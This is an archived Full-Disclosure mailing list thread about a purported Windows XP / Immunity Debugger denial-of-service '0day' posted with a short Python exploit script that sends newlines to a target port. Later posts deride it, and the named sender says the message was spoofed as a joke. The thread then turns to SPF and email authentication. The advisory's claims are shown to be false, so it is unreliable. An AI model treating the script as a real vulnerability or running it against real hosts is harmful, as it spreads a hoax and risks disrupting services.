Login | Register For Free | Help
Search for: (Advanced)

Mailing List Archive: Full Disclosure: Full-Disclosure

Windows XP denial of service 0day found in CTF exercise

 

 

Full Disclosure full-disclosure RSS feed   Index | Next | Previous | View Threaded


adam at infosecinstitute

Apr 16, 2012, 11:48 PM

Post #1 of 10 (459 views)
Permalink
Windows XP denial of service 0day found in CTF exercise

Immunity Debugger Remote Denial of Service 0Day
Tested against version 1.76 and 1.80 on Windows XP distributions

Has not been tested for potential privilege escalation vectors.

We first wrote about Immunity Debugger here: http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/

Discovered by a student that wishes to remain anonymous in the course CTF. This 0day exploit for Windows was discovered by a student in the InfoSec Institute Ethical Hacking class, during an evening CTF exercise. The student wishes to remain anonymous, he has contributed a python version of the 0day. A patch that can be applied to Windows has not been made available. You can find a python version of the exploit to copy and paste here:


#!/usr/bin/python
#Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec Institute student
#For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
import sys
import os
import time
import getopt
import socket

class Error(Exception):
def __init__(self, error):
self.errorStr=error

def __str__(self):
return repr(self.errorStr)

class Exploit():

def __init__(self, targetHost, targetPort):
self.targetHost = targetHost

def exploit(self, targetHost, targetPort):

try:
socket.inet_aton(targetHost)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((targetHost,targetPort))
except socket.error:
raise Error("Unable to exploit (Connect failed.)")
sys.exit(0)

# exploit
try:
s.sendto("\n\n\n", (targetHost, targetPort))
except:
raise Error("Unable to exploit (Exploit failed.)")


def usage():
print "[!] Usage:"
print " ( -h, --help ):"
print " Print this message."
print " ( --targetHost= ): Target host."
print " --targetHost=127.0.0.1"
print " ( --targetPort= ): Target port."
print " --targetPort=8888"

def main():
print "[$] Windows XP 0Day"
try:
opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=", "targetPort="])
except getopt.GetoptError, err:
# Print help information and exit:
print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized"
usage()
sys.exit(0)

targetHost=None
targetPort=None

for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit(0)
elif opt =="--targetHost":
targetHost=arg
elif opt =="--targetPort":
targetPort=arg
else:
# I would be assuming to say we'll never get here.
print "[!] Parameter error."
usage()
sys.exit(0)

if not targetHost:
print "[!] Parameter error: targetHost not set."
usage()
sys.exit(0)

if not targetPort:
print "[!] Parameter error: targetPort not set."
usage()
sys.exit(0)

exploit = Exploit(targetHost, targetPort)

print "[*] Attempting to exploit:"

try:
exploit.exploit(targetHost, int(targetPort))
except Error as error:
print "[!] Exploit Error: %s" % (error.errorStr)
exit(0)
print "[*] Exploit appears to have worked."

# Standard boilerplate to call the main() function to begin
# the program.
if __name__=='__main__':
main()
Attachments: immunity.png (92.8 KB)


memvandal at gmail

Apr 17, 2012, 12:42 AM

Post #2 of 10 (452 views)
Permalink
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

Windows XP 0day? LOL. seems InfoSec Institute is going crazy day by day.

and who exploits remote DDoS on 127.0.0.1 and takes screenshot?! lol

MemoryVandal


On Tue, Apr 17, 2012 at 12:18 PM, Adam Behnke <adam [at] infosecinstitute>wrote:

> Immunity Debugger Remote Denial of Service 0Day
> Tested against version 1.76 and 1.80 on Windows XP distributions
>
> Has not been tested for potential privilege escalation vectors.
>
> We first wrote about Immunity Debugger here:
> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>
> Discovered by a student that wishes to remain anonymous in the course CTF.
> This 0day exploit for Windows was discovered by a student in the InfoSec
> Institute Ethical Hacking class, during an evening CTF exercise. The
> student wishes to remain anonymous, he has contributed a python version of
> the 0day. A patch that can be applied to Windows has not been made
> available. You can find a python version of the exploit to copy and paste
> here:
>
>
> #!/usr/bin/python
> #Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec
> Institute student
> #For full write up and description go to
> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
> import sys
> import os
> import time
> import getopt
> import socket
>
> class Error(Exception):
> def __init__(self, error):
> self.errorStr=error
>
> def __str__(self):
> return repr(self.errorStr)
>
> class Exploit():
>
> def __init__(self, targetHost, targetPort):
> self.targetHost = targetHost
>
> def exploit(self, targetHost, targetPort):
>
> try:
> socket.inet_aton(targetHost)
> s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
> s.connect((targetHost,targetPort))
> except socket.error:
> raise Error("Unable to exploit (Connect failed.)")
> sys.exit(0)
>
> # exploit
> try:
> s.sendto("\n\n\n", (targetHost, targetPort))
> except:
> raise Error("Unable to exploit (Exploit failed.)")
>
>
> def usage():
> print "[!] Usage:"
> print " ( -h, --help ):"
> print " Print this message."
> print " ( --targetHost= ): Target host."
> print " --targetHost=127.0.0.1"
> print " ( --targetPort= ): Target port."
> print " --targetPort=8888"
>
> def main():
> print "[$] Windows XP 0Day"
> try:
> opts, args = getopt.getopt(sys.argv[1:], "h", ["help",
> "targetHost=", "targetPort="])
> except getopt.GetoptError, err:
> # Print help information and exit:
> print '[!] Parameter error:' + str(err) # Will print
> something like "option -a not recognized"
> usage()
> sys.exit(0)
>
> targetHost=None
> targetPort=None
>
> for opt, arg in opts:
> if opt in ("-h", "--help"):
> usage()
> sys.exit(0)
> elif opt =="--targetHost":
> targetHost=arg
> elif opt =="--targetPort":
> targetPort=arg
> else:
> # I would be assuming to say we'll never get here.
> print "[!] Parameter error."
> usage()
> sys.exit(0)
>
> if not targetHost:
> print "[!] Parameter error: targetHost not set."
> usage()
> sys.exit(0)
>
> if not targetPort:
> print "[!] Parameter error: targetPort not set."
> usage()
> sys.exit(0)
>
> exploit = Exploit(targetHost, targetPort)
>
> print "[*] Attempting to exploit:"
>
> try:
> exploit.exploit(targetHost, int(targetPort))
> except Error as error:
> print "[!] Exploit Error: %s" % (error.errorStr)
> exit(0)
> print "[*] Exploit appears to have worked."
>
> # Standard boilerplate to call the main() function to begin
> # the program.
> if __name__=='__main__':
> main()
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


achileos at gmail

Apr 17, 2012, 12:46 AM

Post #3 of 10 (458 views)
Permalink
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

You didn't even read the mail ! And, yes, they actually have chosen a
quite misleading title and content for the mail ...


>> Immunity Debugger Remote Denial of Service 0Day
>> Tested against version 1.76 and 1.80 on Windows XP distributions

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


memvandal at gmail

Apr 17, 2012, 1:50 AM

Post #4 of 10 (451 views)
Permalink
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

well, i did read the mail completely. the response was just to poke fun ;)

didnt test the code though but, just sending "\n\n\n" does ddos is
something really funny.

MemoryVandal



On Tue, Apr 17, 2012 at 1:16 PM, Romain Bourdy <achileos [at] gmail> wrote:

> You didn't even read the mail ! And, yes, they actually have chosen a
> quite misleading title and content for the mail ...
>
>
> >> Immunity Debugger Remote Denial of Service 0Day
> >> Tested against version 1.76 and 1.80 on Windows XP distributions
>


mihamina at rktmb

Apr 17, 2012, 3:12 AM

Post #5 of 10 (438 views)
Permalink
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

On 04/17/2012 11:50 AM, Memory Vandal wrote:
> didnt test the code though but, just sending "\n\n\n" does ddos is
> something really funny.

Did someone test? :-)


--
RMA.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


justin at madirish

Apr 17, 2012, 5:26 AM

Post #6 of 10 (442 views)
Permalink
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Windows XP denial of service 0day found in CTF exercise

Oof, this is almost as bad as that BackTrack 0 day released the other
day
(http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/).
Any response from Microsoft yet?

Justin C. Klein Keane
http://www.MadIrish.net

The PGP signature on this email can be verified using the public key at
http://www.madirish.net/gpgkey

On 04/17/2012 02:48 AM, Adam Behnke wrote:
> Immunity Debugger Remote Denial of Service 0Day Tested against
> version 1.76 and 1.80 on Windows XP distributions
>
> Has not been tested for potential privilege escalation vectors.
>
> We first wrote about Immunity Debugger here:
> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>
> Discovered by a student that wishes to remain anonymous in the
> course CTF. This 0day exploit for Windows was discovered by a
> student in the InfoSec Institute Ethical Hacking class, during an
> evening CTF exercise. The student wishes to remain anonymous, he
> has contributed a python version of the 0day. A patch that can be
> applied to Windows has not been made available. You can find a
> python version of the exploit to copy and paste here:
>
>
> #!/usr/bin/python #Windows XP denial of service 0day exploit
> discovered on 4.9.12 by InfoSec Institute student #For full write
> up and description go to
> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>
>
import sys
> import os import time import getopt import socket
>
> class Error(Exception): def __init__(self, error):
> self.errorStr=error def __str__(self): return repr(self.errorStr)
>
> class Exploit():
>
> def __init__(self, targetHost, targetPort): self.targetHost =
> targetHost
>
> def exploit(self, targetHost, targetPort):
>
> try: socket.inet_aton(targetHost) s =
> socket.socket(socket.AF_INET,socket.SOCK_STREAM)
> s.connect((targetHost,targetPort)) except socket.error: raise
> Error("Unable to exploit (Connect failed.)") sys.exit(0)
>
> # exploit try: s.sendto("\n\n\n", (targetHost, targetPort))
> except: raise Error("Unable to exploit (Exploit failed.)")
>
> def usage(): print "[!] Usage:" print " ( -h, --help ):" print "
> Print this message." print " ( --targetHost= ): Target host." print
> " --targetHost=127.0.0.1" print " ( --targetPort= ): Target
> port." print " --targetPort=8888"
>
> def main(): print "[$] Windows XP 0Day" try: opts, args =
> getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=",
> "targetPort="]) except getopt.GetoptError, err: # Print help
> information and exit: print '[!] Parameter error:' + str(err) #
> Will print something like "option -a not recognized" usage()
> sys.exit(0)
>
> targetHost=None targetPort=None for opt, arg in opts: if opt in
> ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost":
> targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I
> would be assuming to say we'll never get here. print "[!] Parameter
> error." usage() sys.exit(0) if not targetHost: print "[!]
> Parameter error: targetHost not set." usage() sys.exit(0)
>
> if not targetPort: print "[!] Parameter error: targetPort not
> set." usage() sys.exit(0)
>
> exploit = Exploit(targetHost, targetPort)
>
> print "[*] Attempting to exploit:" try:
> exploit.exploit(targetHost, int(targetPort)) except Error as
> error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0)
> print "[*] Exploit appears to have worked."
>
> # Standard boilerplate to call the main() function to begin # the
> program. if __name__=='__main__': main()
>
>
>
> _______________________________________________ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iPwEAQECAAYFAk+NYXEACgkQkSlsbLsN1gBiggb/efTTww5szr9rcI+NbsUzybuk
rhPyvj99VJMMVCUjHrDrWKXQeTD/rrorY3SYMIGNlHzVWgqkiswM5N16Fy9MvqIH
2Cc8aJ5kh2xi9vtlCHlPZ7XJeN3tPEL+8/qOVbT7I2CNeD8JJseVfcJwnoEyyumm
SZYmoxjJriMT7IAXysHJudaF294DvC+z6drvF+ou8wnVcIB0nkXoCVNsbcDK9dwS
R4f0a+QYN1tXM7+8za6/VznbDwcqw/amqeS3V883lqlt0XCHx5zIh+VxG0qvB5Ui
EPjoh3P/OEMP7PYRozM=
=y+j6
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


adam at infosecinstitute

Apr 17, 2012, 7:07 AM

Post #7 of 10 (433 views)
Permalink
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

Guys, this is a fake release, someone spoofed my email and sent this out
as a joke to mock the wicd release from last week. Please note that if you
click on the links, there is nothing there concerning this.




>
> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>> Immunity Debugger Remote Denial of Service 0Day Tested against
>> version 1.76 and 1.80 on Windows XP distributions
>>
>> Has not been tested for potential privilege escalation vectors.
>>
>> We first wrote about Immunity Debugger here:
>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>>
>> Discovered by a student that wishes to remain anonymous in the
>> course CTF. This 0day exploit for Windows was discovered by a
>> student in the InfoSec Institute Ethical Hacking class, during an
>> evening CTF exercise. The student wishes to remain anonymous, he
>> has contributed a python version of the 0day. A patch that can be
>> applied to Windows has not been made available. You can find a
>> python version of the exploit to copy and paste here:
>>
>>
>> #!/usr/bin/python #Windows XP denial of service 0day exploit
>> discovered on 4.9.12 by InfoSec Institute student #For full write
>> up and description go to
>> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>>
>>
> import sys
>> import os import time import getopt import socket
>>
>> class Error(Exception): def __init__(self, error):
>> self.errorStr=error def __str__(self): return repr(self.errorStr)
>>
>> class Exploit():
>>
>> def __init__(self, targetHost, targetPort): self.targetHost =
>> targetHost
>>
>> def exploit(self, targetHost, targetPort):
>>
>> try: socket.inet_aton(targetHost) s =
>> socket.socket(socket.AF_INET,socket.SOCK_STREAM)
>> s.connect((targetHost,targetPort)) except socket.error: raise
>> Error("Unable to exploit (Connect failed.)") sys.exit(0)
>>
>> # exploit try: s.sendto("\n\n\n", (targetHost, targetPort))
>> except: raise Error("Unable to exploit (Exploit failed.)")
>>
>> def usage(): print "[!] Usage:" print " ( -h, --help ):" print "
>> Print this message." print " ( --targetHost= ): Target host." print
>> " --targetHost=127.0.0.1" print " ( --targetPort= ): Target
>> port." print " --targetPort=8888"
>>
>> def main(): print "[$] Windows XP 0Day" try: opts, args =
>> getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=",
>> "targetPort="]) except getopt.GetoptError, err: # Print help
>> information and exit: print '[!] Parameter error:' + str(err) #
>> Will print something like "option -a not recognized" usage()
>> sys.exit(0)
>>
>> targetHost=None targetPort=None for opt, arg in opts: if opt in
>> ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost":
>> targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I
>> would be assuming to say we'll never get here. print "[!] Parameter
>> error." usage() sys.exit(0) if not targetHost: print "[!]
>> Parameter error: targetHost not set." usage() sys.exit(0)
>>
>> if not targetPort: print "[!] Parameter error: targetPort not
>> set." usage() sys.exit(0)
>>
>> exploit = Exploit(targetHost, targetPort)
>>
>> print "[*] Attempting to exploit:" try:
>> exploit.exploit(targetHost, int(targetPort)) except Error as
>> error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0)
>> print "[*] Exploit appears to have worked."
>>
>> # Standard boilerplate to call the main() function to begin # the
>> program. if __name__=='__main__': main()
>>
>>
>>
>> _______________________________________________ Full-Disclosure -
>> We believe in it. Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>> sponsored by Secunia - http://secunia.com/
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.12 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>
> iQIcBAEBAgAGBQJPjWNjAAoJEIH7slQlJAgKlw4P/0AzWqUuogRtF9wP2K91qFXq
> QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL
> hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI
> CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i
> FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g
> z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9
> K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J
> DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV
> jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T
> 6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZkuTgkIXOt05
> 7PK28cqrKpTJixQNoiB4yLk65M1a8c8Ed/mXaHSFC04qn7RKhbMrdHmPzUnFpLCW
> 4r6K58WTZ7qR2nTNKnQi
> =Uoev
> -----END PGP SIGNATURE-----
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


secretpackets at gmail

Apr 17, 2012, 9:36 AM

Post #8 of 10 (425 views)
Permalink
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

This is awesome!

Its almost as awesome as a privilege escalation from root to root that
works only in backtrack.

--
tuna
65617420646120706f6f20706f6f



On Tue, Apr 17, 2012 at 10:07, <adam [at] infosecinstitute> wrote:
> Guys, this is a fake release, someone spoofed my email and sent this out
> as a joke to mock the wicd release from last week. Please note that if you
> click on the links, there is nothing there concerning this.
>
>
>
>
>>
>> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>>> Immunity Debugger Remote Denial of Service 0Day Tested against
>>> version 1.76 and 1.80 on Windows XP distributions
>>>
>>> Has not been tested for potential privilege escalation vectors.
>>>
>>> We first wrote about Immunity Debugger here:
>>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>>>
>>>  Discovered by a student that wishes to remain anonymous in the
>>> course CTF. This 0day exploit for Windows was discovered by a
>>> student in the InfoSec Institute Ethical Hacking class, during an
>>> evening CTF exercise. The student wishes to remain anonymous, he
>>> has contributed a python version of the 0day. A patch that can be
>>> applied to Windows has not been made available. You can find a
>>> python version of the exploit to copy and paste here:
>>>
>>>
>>> #!/usr/bin/python #Windows XP denial of service 0day exploit
>>> discovered on 4.9.12 by InfoSec Institute student #For full write
>>> up and description go to
>>> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>>>
>>>
>> import sys
>>> import os import time import getopt import socket
>>>
>>> class Error(Exception): def __init__(self, error):
>>> self.errorStr=error  def __str__(self): return repr(self.errorStr)
>>>
>>> class Exploit():
>>>
>>> def __init__(self, targetHost, targetPort): self.targetHost =
>>> targetHost
>>>
>>> def exploit(self, targetHost, targetPort):
>>>
>>> try: socket.inet_aton(targetHost) s =
>>> socket.socket(socket.AF_INET,socket.SOCK_STREAM)
>>> s.connect((targetHost,targetPort)) except socket.error: raise
>>> Error("Unable to exploit (Connect failed.)") sys.exit(0)
>>>
>>> # exploit try: s.sendto("\n\n\n", (targetHost, targetPort))
>>> except: raise Error("Unable to exploit (Exploit failed.)")
>>>
>>> def usage(): print "[!] Usage:" print "      ( -h, --help ):" print "
>>> Print this message." print " ( --targetHost= ): Target host." print
>>> "            --targetHost=127.0.0.1" print " ( --targetPort= ): Target
>>> port." print "               --targetPort=8888"
>>>
>>> def main(): print "[$] Windows XP 0Day" try: opts, args =
>>> getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=",
>>> "targetPort="]) except getopt.GetoptError, err: # Print help
>>> information and exit: print '[!] Parameter error:' + str(err) #
>>> Will print something like "option -a not recognized" usage()
>>> sys.exit(0)
>>>
>>> targetHost=None targetPort=None  for opt, arg in opts: if opt in
>>> ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost":
>>> targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I
>>> would be assuming to say we'll never get here. print "[!] Parameter
>>> error." usage() sys.exit(0)  if not targetHost: print "[!]
>>> Parameter error: targetHost not set." usage() sys.exit(0)
>>>
>>> if not targetPort: print "[!] Parameter error: targetPort not
>>> set." usage() sys.exit(0)
>>>
>>> exploit = Exploit(targetHost, targetPort)
>>>
>>> print "[*] Attempting to exploit:"  try:
>>> exploit.exploit(targetHost, int(targetPort)) except Error as
>>> error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0)
>>> print "[*] Exploit appears to have worked."
>>>
>>> # Standard boilerplate to call the main() function to begin # the
>>> program. if __name__=='__main__': main()
>>>
>>>
>>>
>>> _______________________________________________ Full-Disclosure -
>>> We believe in it. Charter:
>>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>>> sponsored by Secunia - http://secunia.com/
>> -----BEGIN PGP SIGNATURE-----
>> Version: GnuPG v1.4.12 (GNU/Linux)
>> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>>
>> iQIcBAEBAgAGBQJPjWNjAAoJEIH7slQlJAgKlw4P/0AzWqUuogRtF9wP2K91qFXq
>> QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL
>> hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI
>> CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i
>> FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g
>> z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9
>> K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J
>> DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV
>> jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T
>> 6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZkuTgkIXOt05
>> 7PK28cqrKpTJixQNoiB4yLk65M1a8c8Ed/mXaHSFC04qn7RKhbMrdHmPzUnFpLCW
>> 4r6K58WTZ7qR2nTNKnQi
>> =Uoev
>> -----END PGP SIGNATURE-----
>>
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


elazar at hushmail

Apr 17, 2012, 2:48 PM

Post #9 of 10 (432 views)
Permalink
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

<snip>
Received-SPF: softfail (lists.grok.org.uk: transitioning domain of
adam [at] infosecinstitute does not designate 46.167.245.118 as
permitted sender)

Received: from emkei.cz (emkei.cz [46.167.245.118]) by lists.grok.org.uk (Postfix) with ESMTP id D4324C0
for <full-disclosure [at] lists>; Tue, 17 Apr 2012 07:58:09 +0100 (BST)
</snip>


At least configure your SPF record policy to hard fail, and consider Domain Keys and/or DMARC.

elazar

On Tuesday, April 17, 2012 at 10:40 AM, adam [at] infosecinstitute wrote:Guys, this is a fake release, someone spoofed my email and sent this out
as a joke to mock the wicd release from last week. Please note that if you
click on the links, there is nothing there concerning this.




>
> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>> Immunity Debugger Remote Denial of Service 0Day Tested against
>> version 1.76 and 1.80 on Windows XP distributions
>>
>> Has not been tested for potential privilege escalation vectors.
>>
>> We first wrote about Immunity Debugger here:
>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>>
>> Discovered by a student that wishes to remain anonymous in the
>> course CTF. This 0day exploit for Windows was discovered by a
>> student in the InfoSec Institute Ethical Hacking class, during an
>> evening CTF exercise. The student wishes to remain anonymous, he
>> has contributed a python version of the 0day. A patch that can be
>> applied to Windows has not been made available. You can find a
>> python version of the exploit to copy and paste here:
>>
>>
>> #!/usr/bin/python #Windows XP denial of service 0day exploit
>> discovered on 4.9.12 by InfoSec Institute student #For full write
>> up and description go to
>> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>>
>>
> import sys
>> import os import time import getopt import socket
>>
>> class Error(Exception): def __init__(self, error):
>> self.errorStr=error def __str__(self): return repr(self.errorStr)
>>
>> class Exploit():
>>
>> def __init__(self, targetHost, targetPort): self.targetHost =
>> targetHost
>>
>> def exploit(self, targetHost, targetPort):
>>
>> try: socket.inet_aton(targetHost) s =
>> socket.socket(socket.AF_INET,socket.SOCK_STREAM)
>> s.connect((targetHost,targetPort)) except socket.error: raise
>> Error("Unable to exploit (Connect failed.)") sys.exit(0)
>>
>> # exploit try: s.sendto("\n\n\n", (targetHost, targetPort))
>> except: raise Error("Unable to exploit (Exploit failed.)")
>>
>> def usage(): print "[!] Usage:" print " ( -h, --help ):" print "
>> Print this message." print " ( --targetHost= ): Target host." print
>> " --targetHost=127.0.0.1" print " ( --targetPort= ): Target
>> port." print " --targetPort=8888"
>>
>> def main(): print "[$] Windows XP 0Day" try: opts, args =
>> getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=",
>> "targetPort="]) except getopt.GetoptError, err: # Print help
>> information and exit: print '[!] Parameter error:' + str(err) #
>> Will print something like "option -a not recognized" usage()
>> sys.exit(0)
>>
>> targetHost=None targetPort=None for opt, arg in opts: if opt in
>> ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost":
>> targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I
>> would be assuming to say we'll never get here. print "[!] Parameter
>> error." usage() sys.exit(0) if not targetHost: print "[!]
>> Parameter error: targetHost not set." usage() sys.exit(0)
>>
>> if not targetPort: print "[!] Parameter error: targetPort not
>> set." usage() sys.exit(0)
>>
>> exploit = Exploit(targetHost, targetPort)
>>
>> print "[*] Attempting to exploit:" try:
>> exploit.exploit(targetHost, int(targetPort)) except Error as
>> error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0)
>> print "[*] Exploit appears to have worked."
>>
>> # Standard boilerplate to call the main() function to begin # the
>> program. if __name__=='__main__': main()
>>
>>
>>
>> _______________________________________________ Full-Disclosure -
>> We believe in it. Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>> sponsored by Secunia - http://secunia.com/
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.12 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>
> iQIcBAEBAgAGBQJPjWNjAAoJEIH7slQlJAgKlw4P/0AzWqUuogRtF9wP2K91qFXq
> QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL
> hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI
> CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i
> FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g
> z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9
> K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J
> DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV
> jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T
> 6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZkuTgkIXOt05
> 7PK28cqrKpTJixQNoiB4yLk65M1a8c8Ed/mXaHSFC04qn7RKhbMrdHmPzUnFpLCW
> 4r6K58WTZ7qR2nTNKnQi
> =Uoev
> -----END PGP SIGNATURE-----
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Valdis.Kletnieks at vt

Apr 17, 2012, 4:10 PM

Post #10 of 10 (425 views)
Permalink
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

On Tue, 17 Apr 2012 17:48:47 -0400, "Elazar Broad" said:

> At least configure your SPF record policy to hard fail, and consider Domain Keys and/or DMARC.

Given where his MX's point, and the fact that the SPF includes a :include that
points at another domain, simply setting it to "hard fail" without breaking his
e-mail may or may not be easy to do. Similarly, if he sets it to hard fail, he
probably can't turn on DKIM without the cooperation of the domain listed in the
:include

(A *lot* of sites that do SPF only code 'soft fail' so that other tools like
spamassassin can add a few points if the mail comes from an "unexpected" place,
but don't want to have hard-fail because that can break users. For instance,
we don't publish a hard-fail because that results in a support headache if one
of our professors goes to a conference and sends e-mail from his hotel room -
and the hotel network hijacks the connection. *loads* of fun to sort that out
when the professor calls our help desk from Seattle or Tokyo. And of course,
he's a chemical engineering professor, so has zero network debugging tools on
the laptop...)

Full Disclosure full-disclosure RSS feed   Index | Next | Previous | View Threaded
 
 


Interested in having your list archived? Contact Gossamer Threads
 
  Web Applications & Managed Hosting Powered by Gossamer Threads Inc.